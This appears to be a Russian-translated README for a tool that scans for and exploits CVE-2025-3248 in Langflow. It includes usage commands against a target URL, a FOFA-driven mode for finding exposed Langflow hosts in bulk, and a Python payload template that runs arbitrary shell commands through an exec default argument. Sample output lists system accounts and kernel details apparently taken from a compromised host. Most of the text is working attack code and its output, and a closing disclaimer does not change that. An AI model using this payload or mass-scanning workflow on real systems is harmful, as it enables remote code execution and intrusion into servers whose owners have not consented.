
Сканер уязвимостей для CVE-2025-3248 в приложениях Langflow. Инструмент для сканирования уязвимости CVE-2025-3248 в приложениях Langflow.
中文 | Английский
Сканер уязвимости CVE-2025-3248 в приложениях Langflow.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# После завершения редактирования
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: URL цели для сканирования--fofa-email: Email для API FOFA--fofa-key: Ключ API FOFA--fofa-query: Поисковый запрос FOFA (по умолчанию: 'app="LOGSPACE-LangFlow"')--country: Фильтр результатов по коду страны (например, CN, US)--max-pages: Максимальное количество страниц FOFA для загрузки (по умолчанию: 5)--page-size: Результатов на страницу (по умолчанию: 100)--timeout: Тайм-аут запроса в секундах (по умолчанию: 10)--no-verify: Отключить проверку SSL--threads: Количество потоков для параллельного сканирования (по умолчанию: 5)-f, --file: Пользовательский Python-файл, используемый в качестве полезной нагрузкиВы можете создавать собственные полезные нагрузки, создав Python-файл:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Затем используйте его с помощью:
python main.py -t https://target.com -f your_payload.py
[+] Учётные записи пользователей:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] Сведения о системе:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Отказ от ответственности Данный инструмент предназначен только для законных целей. Он разработан для образовательных целей, внутреннего тестирования безопасности предприятия или использования в авторизованных средах. Строго запрещается использовать этот инструмент на любых несанкционированных системах, сетях или устройствах, иначе это может нарушить соответствующие законы и нормативные акты.
Пользователи несут всю юридическую ответственность за свои действия. Автор и участники не несут ответственности за любые потери, утечку данных или правовые последствия, вызванные неправильным использованием этого инструмента.
⚠️ Не используйте для нелегальных атак. Не пытайтесь развернуть или запустить этот инструмент на несанкционированных системах.